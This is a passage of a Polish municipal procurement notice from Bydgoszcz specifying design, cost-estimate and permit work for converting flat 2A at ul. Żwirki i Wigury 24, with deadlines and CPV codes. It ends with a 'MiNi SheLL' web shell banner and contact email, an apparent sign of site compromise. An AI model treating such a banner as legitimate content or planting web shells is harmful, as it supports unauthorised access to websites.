3.  opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-   kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)
4. opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD-R : 2 egzemplarze)
5. uzyskanie w imieniu Zamawiającego na podstawie udzielonego pełnomocnictwa, przyjęcia przez WAB przy UM Bydgoszcz zgłoszenia o rozpoczęciu robót objętego projektem bez uwag lub jeżeli dokumentacja będzie wymagała wydania decyzji pozwolenia na budowę - uzyskanie pozwolenia na wykonanie robót objętych projektem (decyzja), zgodnie z przepisami prawa budowlanego.
Termin Wykonania zamówienia:
- termin uzyskania decyzji o warunkach zabudowy i zagospodarowania terenu: 30 dni od daty zawarcia umowy
- termin opracowania dokumentacji projektowo-kosztorysowej na podstawie ww. decyzji i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  (w przypadku kiedy taka decyzja będzie wymagana prawem budowlanym)  lub zgłoszenia o rozpoczęciu robót :  21 dni  od dnia uprawomocnienia się decyzji o warunkach zabudowy i zagospodarowania terenu
-  termin dostarczenia decyzji pozwolenia na budowę: 70 dni  od dnia złożenia wniosku o wydanie decyzji pozwolenia na budowę do UM WAB Bydgoszcz  (w przypadku kiedy taka decyzja będzie wymagana prawem budowlanym)   lub 
-  termin dostarczenia kopii  przyjętego przez WAB UM Bydgoszcz zgłoszenia o zamiarze rozpoczęcia robót:  10 dni  od dnia zaakceptowania przez Zamawiającego dokumentacji projektowo-kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 121.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7:   
-  opracowanie projektu budowlanego na przekwalifikowanie lokalu mieszkalnego nr 2A znajdującego się w budynku przy ul. Żwirki i Wigury 24 w Bydgoszczy na pomieszczenie gospodarcze wraz z uzyskaniem zaświadczenia   o zgodności z miejscowym planem zagospodarowania przestrzennego.  
Zakres  zamówienia  obejmuje : 
1. uzyskanie we własnym zakresie w ramach wynagrodzenia z oferty warunków, map geodezyjnych, opinii, w tym zaświadczenia o zgodności z miejscowym planem zagospodarowania przestrzennego,  oświadczeń od gestorów sieci gwarantujących możliwość korzystania z sieci lub zapewniających dostawy poszczególnych mediów i innych dokumentów niezbędnych do opracowania projektu budowlanego na zmianę sposobu użytkowania lokalu mieszkalnego nr 2A w budynku przy ul. Żwirki i Wigury 24  na cele gospodarcze. 
2. wykonanie projektu budowlanego na zmianę sposobu użytkowania lokalu użytkowego na cele gospodarcze (wersja papierowa - 5 egzemplarzy, na nośniku elektronicznym- płyta CD-R: 2 egzemplarze) zawierającego warunki BIOZ, wytyczne BHP i  p. poż. 
3.  opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-   kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)
4. opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD-R : 2 egzemplarze)
5. uzyskanie w imieniu Zamawiającego na podstawie udzielonego pełnomocnictwa, przyjęcia przez WAB przy UM Bydgoszcz zgłoszenia o rozpoczęciu robót objętego projektem bez uwag lub jeżeli dokumentacja będzie wymagała wydania decyzji pozwolenia na budowę - uzyskanie pozwolenia na wykonanie robót objętych projektem (decyzja), zgodnie z przepisami prawa budowlanego.
Termin Wykonania zamówienia:
- termin uzyskania decyzji o warunkach zabudowy i zagospodarowania terenu: 30 dni od daty zawarcia umowy
- termin opracowania dokumentacji projektowo-kosztorysowej na podstawie ww. decyzji i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  (w przypadku kiedy taka decyzja będzie wymagana prawem budowlanym)  lub zgłoszenia o rozpoczęciu robót :  21 dni  od dnia uprawomocnienia się decyzji o warunkach zabudowy i zagospodarowania terenu
-  termin dostarczenia decyzji pozwolenia na budowę: 70 dni  od dnia złożenia wniosku o wydanie decyzji pozwolenia na budowę do UM WAB Bydgoszcz  (w przypadku kiedy taka decyzja będzie wymagana prawem budowlanym)   lub 
-  termin dostarczenia kopii  przyjętego przez WAB UM Bydgoszcz zgłoszenia o zamiarze rozpoczęcia robót:  10 dni  od dnia zaakceptowania przez Zamawiającego dokumentacji projektowo-kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 121.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com